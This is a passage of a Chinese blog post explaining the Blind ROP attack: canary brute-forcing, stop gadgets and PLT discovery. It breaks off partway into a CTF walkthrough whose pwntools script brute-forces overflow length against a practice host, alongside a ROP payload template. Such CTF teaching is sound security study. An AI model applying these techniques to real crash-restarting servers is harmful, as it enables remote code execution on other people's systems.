<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="wutong">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://wutong01304.github.io/2023/07/17/brop/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="BROP 即 Blind ROP，需要我们在无法获得二进制文件的情况下（在没有给出题目的情况下，只能通过尝试来确定），通过 ROP 进行远程攻击，劫持该应用程序的控制流，可用于开启了 ASLR、NX 和栈 canary 的 64-bit Linux。 一、基本原理1.1 介绍BROP [1] 即 Blind ROP，于2014年被提出。 [1]Bittau A, Belay A, Mashtiza">
<meta property="og:type" content="article">
<meta property="og:title" content="BROP">
<meta property="og:url" content="https://wutong01304.github.io/2023/07/17/BROP/index.html">
<meta property="og:site_name" content="wutong">
<meta property="og:description" content="BROP 即 Blind ROP，需要我们在无法获得二进制文件的情况下（在没有给出题目的情况下，只能通过尝试来确定），通过 ROP 进行远程攻击，劫持该应用程序的控制流，可用于开启了 ASLR、NX 和栈 canary 的 64-bit Linux。 一、基本原理1.1 介绍BROP [1] 即 Blind ROP，于2014年被提出。 [1]Bittau A, Belay A, Mashtiza">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b4.png">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b14.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b15.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b11.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b12.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b13.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b17.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b18.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b19.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b21.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b16.png?x-oss-process=style/watermark">
<meta property="article:published_time" content="2023-07-17T02:44:41.000Z">
<meta property="article:modified_time" content="2023-07-30T11:27:12.180Z">
<meta property="article:author" content="wutong">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="Stack">
<meta property="article:tag" content="BROP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b1.png?x-oss-process=style/watermark">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <!--- Page Info-->
    
    <title>
        
            BROP -
        
        wutong
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"wutong01304.github.io","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":false,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":2,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"static","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"梧桐","subtitle":{"text":["梧桐生矣，于彼朝阳"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.1","navbar":{"auto_hide":false,"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}},"categories":{"Categories":{"icon":"fa-solid fa-folder","path":"/categories/"}},"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Github":{"path":"https://github.com/wutong01304","icon":"github"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"cloud"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/7/1 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                wutong
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                                    
                                        
                                            <i class="github"></i>
                                        
                                        GITHUB
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                             
                                
                                    <i class="github"></i>
                                
                                GITHUB
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROPcover.jpg" alt="BROP" />
                    <h1 class="article-title-cover">BROP</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-avatar.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">wutong</span>
                            
                                <span class="author-label">Lv3</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-17 10:44:41</span>
        <span class="mobile">2023-07-17 10:44</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-07-30 19:27:12</span>
            <span class="mobile">2023-07-30 19:27</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Study/">Study</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Stack/">Stack</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/BROP/">BROP</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>BROP 即 Blind ROP，需要我们在无法获得二进制文件的情况下（在没有给出题目的情况下，只能通过尝试来确定），通过 ROP 进行远程攻击，劫持该应用程序的控制流，可用于开启了 ASLR、NX 和栈 canary 的 64-bit Linux。</p>
<h1 id="一、基本原理"><a href="#一、基本原理" class="headerlink" title="一、基本原理"></a>一、基本原理</h1><h2 id="1-1-介绍"><a href="#1-1-介绍" class="headerlink" title="1.1 介绍"></a>1.1 介绍</h2><p>BROP [1] 即 Blind ROP，于2014年被提出。</p>
<p>[1]Bittau A, Belay A, Mashtizadeh A, et al. Hacking blind[C]&#x2F;&#x2F;2014 IEEE Symposium on Security and Privacy. IEEE, 2014: 227-242.</p>
<p><strong>文章提出：</strong>在不拥有目标二进制或源代码副本的情况下，针对崩溃后重新启动的服务，编写远程堆栈缓冲区溢出漏洞攻击是可能的。</p>
<p>许多服务器在崩溃后会重新启动其工作进程，以提高健壮性，包括Apache、nginx、Samba和OpenSSH，这就使得攻击者可以对其利用。BROP攻击假定服务器应用程序存在堆栈漏洞，并且在崩溃后重新启动。该攻击适用于启用了ASLR（地址空间布局随机化）、不可执行（NX）内存和堆栈Canary的现代64位Linux。作者提出，目前无法针对Windows系统，因为他们尚未将攻击适应Windows ABI。</p>
<p><strong>该攻击由两种新技术实现：</strong></p>
<ul>
<li>Generalized stack reading：通用的栈读取技术，即用于泄漏Canary的已知技术，泄漏保存的返回地址技术。用以在64位上绕过ASLR（地址随机化）。</li>
<li>Blind ROP：这种技术可以远程定位ROP  gadgets。</li>
</ul>
<p>这两种技术都有一个共同的想法，即使用单堆栈漏洞根据服务器进程是否崩溃来泄漏信息。堆栈读取技术使用可能的猜测值逐字节覆盖堆栈，直到找到正确的猜测值并且服务器没有崩溃，从而有效地读取（通过覆盖）堆栈。Blind ROP攻击远程来找到 gadgets 来执行写系统调用，之后服务器的二进制文件可以从内存传输到攻击者的套接字。在这一点上，Canary、ASLR和NX已经被解决，可以使用已知的技术进行攻击。</p>
<p><strong>BROP攻击能够在三种新情况下实现强大的通用攻击：</strong></p>
<ol>
<li>破解专有的封闭二进制服务。使用远程服务时可能会注意到崩溃，或者通过远程模糊测试发现崩溃。（专有封闭二进制服务：专有封闭二进制服务是指一种仅限于特定组织、团队或公司使用的二进制软件服务。这种服务通常是由私人公司或组织开发和维护的，并且没有公开的源代码或文档，因此只有授权用户才能使用和访问该服务。）</li>
<li>破解一个开源库中的漏洞，该漏洞被认为用于专有的封闭二进制服务。例如，一个流行的SSL库可能存在堆栈漏洞，人们可能会猜测它正被专有服务使用。</li>
<li>破解一个二进制文件未知的开源服务器。这适用于手动编译的安装或基于源代码的发行版，如Gentoo。</li>
</ol>
<p><strong>文章的主要贡献如下：</strong></p>
<ol>
<li>提出了一种在服务器上绕过ASLR的技术（通用堆栈读取）。</li>
<li>提出了一种远程查找ROP小工具（BROP）的技术，以便在二进制文件未知时对软件进行攻击。</li>
<li>实现了一种工具——Braille，在给定如何在服务器上触发堆栈溢出的输入的情况下，自动构建漏洞。</li>
<li>第一个针对nginx最近的漏洞的公开攻击，是通用的64位漏洞，它击败了ASLR、Canary 和 NX。</li>
<li>给出了一些针对BROP攻击的防御建议。总之，ASLR必须应用于所有可执行段，并且必须在每次崩溃后重新随机化。</li>
</ol>
<h2 id="1-2-攻击原理"><a href="#1-2-攻击原理" class="headerlink" title="1.2 攻击原理"></a>1.2 攻击原理</h2><p>具体来说，BROP 即 Blind ROP，需要我们在无法获得二进制文件的情况下（在没有给出题目的情况下，只能通过尝试来确定），通过 ROP 进行远程攻击，劫持该应用程序的控制流。即假定存在栈漏洞，在无任何信息的情况下进行攻击。</p>
<p>在已知二进制文件的情况下，我们想要控制程序流程，通常先找到栈溢出漏洞，然后确定栈溢出字节，确定函数返回地址，然后通过gadgets来控制栈进而控制程序流程。参考<a href="https://wutong01304.github.io/2023/07/05/stack/">栈溢出基础知识+函数调用过程 </a> 。</p>
<p>那么没有二进制文件的情况下，我们需要解决的问题有：</p>
<ul>
<li>栈溢出字节是多少？</li>
<li>怎么寻找 gadgets?</li>
<li>如果程序开启了ASLR、NX、Canary要怎么解决？</li>
</ul>
<p>栈溢出字节可以通过暴力枚举来解决，第三个问题可以用其它常规方法，比如爆破canary、ret2libc l等来解决，因此BROP主要需要解决的问题就是，如何找到gadgets。</p>
<p><strong>攻击条件：</strong></p>
<ul>
<li>程序必须存在溢出漏洞，以便攻击者可以控制程序流程。</li>
<li>进程崩溃以后可以重启（重启给暴力枚举创造了条件），而且重启之后的地址与先前的地址一样。（不一样的话，即便找到 gadgets 也不能用）</li>
</ul>
<p>在BROP中，基本的遵循的<strong>思路</strong>如下</p>
<ol>
<li>判断栈溢出长度：从 1 开始暴力枚举，直到程序崩溃</li>
<li>Stack Reading：获取栈上的数据来泄露canary，以及ebp和返回地址。</li>
<li>Bind ROP：找到足够多的 gadgets 来控制输出函数的参数，并且对其进行调用，比如说常见的 write 函数以及puts函数。</li>
<li>Build the exploit：利用输出函数来 dump 出程序以便于来找到更多的 gadgets，从而可以写出最后的 exploit。</li>
</ol>
<hr>
<h1 id="二、攻击流程"><a href="#二、攻击流程" class="headerlink" title="二、攻击流程"></a>二、攻击流程</h1><h2 id="2-1-Stack-Reading"><a href="#2-1-Stack-Reading" class="headerlink" title="2.1 Stack Reading"></a>2.1 Stack Reading</h2><p><strong>Canary：</strong>当启用栈保护后，函数开始执行的时候会先往栈里插入cookie信息，当函数真正返回的时候会验证cookie信息是否合法，如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉，导致栈保护检查失败而阻止 shellcode 的执行。在Linux中我们将cookie信息称为canary。</p>
<p>Canary在栈中的位置如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>即Canary在EBP的上面。Canary本身可以通过逐字节爆破来获取，如图所示：（正常Canary第一个字节为’\x00’，下图只是为了举例）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>假设某个32位程序的Canary为 51 03 22 94，缓冲区为32字节，那么在输入28字节就会碰到 Canary，如果继续输入，就会覆盖Canary，程序会报错。如果我们输入的是 **’a’<em>28+’\x51</em>*’ 呢 ？按照linux进栈的规则，’\x51’ 会把 Canary的第一位覆盖，覆盖之后Canary并没有发生变化，也就不会报错了。</p>
<p>这也就是爆破Canaty的原理，每个字节有 0x00<del>0xff 种可能，也就是256种，只要我们从1试到256，就一定能知道最后一个字节的Canary是多少。当我们知道输入到**’a’*28+’\x51’ <strong>时，下一次输入就不会再报错，然后我们就可以尝试下一个字节，输入</strong>‘a’*28+’\x94’+’0</del>255‘**</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>当我们尝试到03时，程序就不会报错了，前两个字节的Canary就被爆破了。所以我们只要逐字节爆破，在32位中，需要爆破四个字节的Canary，只要尝试4×256&#x3D;1024次就一定可以爆破Canary，64位8个字节，只需要尝试 8×256&#x3D;2048 次就一定可以爆破Canary。爆破Canary不是本文的关键，因此爆破Canary的例题，将在下一篇文章<a href="https://wutong01304.github.io/2023/07/19/tricks/">花式栈溢出技巧</a>介绍。</p>
<h2 id="2-2-Bind-ROP"><a href="#2-2-Bind-ROP" class="headerlink" title="2.2 Bind ROP"></a>2.2 Bind ROP</h2><p>找到足够多的 gadgets 来控制输出函数的参数，并且对其进行调用，比如说常见的 write 函数以及 puts 函数。具体要做的就是：</p>
<ul>
<li>找gadgets </li>
<li>找 plt 表，比如 write、strcmp</li>
</ul>
<h3 id="2-2-1-找gadgets-和stop-gadget"><a href="#2-2-1-找gadgets-和stop-gadget" class="headerlink" title="2.2.1 找gadgets 和stop gadget"></a>2.2.1 找gadgets 和stop gadget</h3><p>远程查找 gadgets 的基本思想是：覆盖保存的返回地址并检查程序行为来扫描应用程序的文本段。具体是利用填入不同的已知地址顺序来知道所猜的地址是否为可用gadget。一般来说，在返回地址填入一个地址时，会发生两件事：程序将崩溃或挂起，然后连接将关闭或保持打开。大多数时候，程序会崩溃，但当它没有崩溃时，就表示这是一个gadgets。</p>
<p>但是，即便我们找到gadgets，程序没有崩溃，后续也会因为改变了栈结构而发生崩溃，那么我们如何知道程序崩溃是因为什么导致的？如何知道返回地址填入gadgets后程序没有崩溃呢？因此论文提出了一个 stop gadget的概念，能够使程序正常返回的地址。</p>
<p>如图所示（图片截取于论文Hacking blind）：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b4.png"
                     
                ></p>
<p>程序在找到一个gadgets后，转去 stop gadget 执行。程序陷入循环，使攻击者一直保持连接状态，也就是其告诉攻击者，其所测试的地址是一段gadget。也就是说有了stop gadget，那些原本会导致程序崩溃的地址还是一样会导致崩溃，但那些正常返回的地址则会通过 stop gadget 进入被挂起的状态。stop gadget 地址一般为 main 或者 _start。</p>
<p>作者将gadgets分为3类：</p>
<ul>
<li><strong>Probe：</strong>探针，也就是我们想要探测的代码地址。一般来说，都是64位程序，可以直接从0x400000尝试。</li>
<li><strong>Stop：</strong>不会使得程序崩溃的stop gadget的地址。</li>
<li><strong>Trap：</strong>可以导致程序崩溃的地址，直接写 p64(0) 就可以</li>
</ul>
<p><strong>probe,stop,traps ( trap, trap,…)：</strong>我们可以通过这样的布局找到不对栈操作的gadgets，如：</p>
<ul>
<li>ret; </li>
<li>xor, rax, rax; ret;</li>
</ul>
<p><strong>probe,trap,stop,traps：</strong>我们可以通过这样的布局找到只是弹出一个栈变量的 gadget。如</p>
<ul>
<li>pop rax; ret</li>
<li>pop rdi; ret</li>
</ul>
<p><strong>probe, trap, trap, trap, trap, trap, trap, stop, traps：</strong>我们可以通过这样的布局来找到弹出 6 个栈变量的 gadget，也就是与 brop gadget 相似的 gadget。</p>
<p>如果可以连续 pop6 个且不崩溃，很有可能就是通用gadgets（详见<a href="https://wutong01304.github.io/2023/07/11/ret2csu/">ret2csu</a>）。</p>
<p>根据之前的：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b14.png?x-oss-process=style/watermark"
                     
                ></p>
<p>我们可以发现，从找到的 brop_gadget 其中 pop r15;ret 对应的字节码为41 5f c3。后两字节码 5f c3 对应的汇编即为 pop rdi;ret。这是为什么呢？我们可以去查pop rdi, ret的汇编码，也就是5f c3（ret的汇编码是C3），因此我们可以利用pop r15;ret 的汇编码来实现pop rdi; ret的功能。pop rdi；ret 的地址就是gadget + 9。</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b15.png?x-oss-process=style/watermark"
                      style="zoom:100%;" 
                >

<h3 id="2-2-2-找-plt-表"><a href="#2-2-2-找-plt-表" class="headerlink" title="2.2.2 找 plt 表"></a>2.2.2 找 plt 表</h3><p>程序的plt表具有比较规整的结构，每一个plt表项都是16字节。而且，在每一个表项的6字节偏移处，是该表项对应的函数的解析路径，即程序最初执行该函数的时候，会执行该路径对函数的got地址进行解析。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>对于大多数plt调用来说，一般都不容易崩溃，即使是使用了比较奇怪的参数。所以说，如果我们发现了一系列的长度为16的没有使得程序崩溃的代码段，那么我们有一定的理由相信我们遇到了plt表。</p>
<p>找到plt表后，我们可以遍历plt中的表项，也可以利用函数的特性来寻找我们需要的函数。比如puts函数。我们根据brop gadget 偏移可以得到相应的gadgets（详见<a href="https://wutong01304.github.io/2023/07/11/ret2csu/">ret2csu</a>。同时在程序还没有开启PIE保护的情况下，0x400000处为ELF文件的头部，其内容为\x7fELF。所以我们可以根据这个来进行判断。</p>
<p>构造以下输入：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;a&#x27;</span> * length + p64(rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadget)</span><br></pre></td></tr></table></figure></div>

<p>如果程序成功打印出来\x7fELF，就说明我们找到puts_plt的地址了。</p>
<p>此时，攻击者已经可以控制输出函数了，那么攻击者就可以输出.text段更多的内容以便于来找到更多合适gadgets。然后对其进行攻击。</p>
<hr>
<h1 id="三、例题"><a href="#三、例题" class="headerlink" title="三、例题"></a>三、例题</h1><p>题目链接：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#axb_2019_brop64" >https://buuoj.cn/challenges#axb_2019_brop64 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> 。也可以去buuctf上找，题目名字：axb_2019_brop64</p>
<p>参考链接：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/mcmuyanga/article/details/112904455" >https://blog.csdn.net/mcmuyanga/article/details/112904455 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>尽管buuctf给出了题目文件，但是这道题可以用BROP的方法做，所以可以不用下载。题目比较简单，并没有使用PIE和Canary。</p>
<h2 id="3-1-判断栈溢出长度"><a href="#3-1-判断栈溢出长度" class="headerlink" title="3.1 判断栈溢出长度"></a>3.1 判断栈溢出长度</h2><p>首先链接一下靶机，看一下程序：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>程序会将输入的内容打印一遍，然后退出。</p>
<p>输入300个字符，发现存在栈溢出漏洞：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b9.png?x-oss-process=style/watermark"
                     
                ></p>
<p>然后输入<code>%p、%s、%x</code>等格式化控制字符，看一下有没有格式化字符串漏洞（在后续的文章中<a href="https://wutong01304.github.io/2023/07/23/fmtstr/">格式化字符串漏洞</a>介绍）。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>没有发现格式化字符串漏洞。</p>
<p>程序没有溢出时会输出Goodbye，因此我们可以从这里判断溢出长度：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Force_find_padding</span>():</span><br><span class="line">    padding_length=<span class="number">0</span> <span class="comment">#长度初始为0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            padding_length=padding_length+<span class="number">1</span> <span class="comment">#每次尝试加1</span></span><br><span class="line">            sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">29457</span>) <span class="comment">#链接远程</span></span><br><span class="line">            sh.recvuntil(<span class="string">&quot;Please tell me:&quot;</span>)</span><br><span class="line">            sh.send(<span class="string">&#x27;A&#x27;</span> * padding_length) </span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Goodbye!&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> sh.recvall(): <span class="comment">#如果最后输出的内容里面没有Goodbye，程序就溢出</span></span><br><span class="line">                <span class="keyword">raise</span> <span class="string">&quot;Programe not exit normally!&quot;</span></span><br><span class="line">            sh.close() <span class="comment">#断开链接</span></span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            log.success(<span class="string">&quot;The true padding length is &quot;</span>+<span class="built_in">str</span>(padding_length-<span class="number">1</span>)) <span class="comment">#减一就是栈的长度</span></span><br><span class="line">            <span class="keyword">return</span> padding_length</span><br><span class="line">    log.error(<span class="string">&quot;We don&#x27;t find true padding length!&quot;</span>)</span><br><span class="line"></span><br><span class="line">padding_length=Force_find_padding()</span><br></pre></td></tr></table></figure></div>

<p>得到<strong>栈溢出长度216</strong>：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/BROP/b8.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="3-2-寻找stop-gadget"><a href="#3-2-寻找stop-gadget" class="headerlink" title="3.2  寻找stop gadget"></a>3.2  <strong>寻找stop gadget</strong></h2><p>此处我们希望我们能够爆破出main函数的首地址，进而直接让程序回到main函数进行执行。</p>
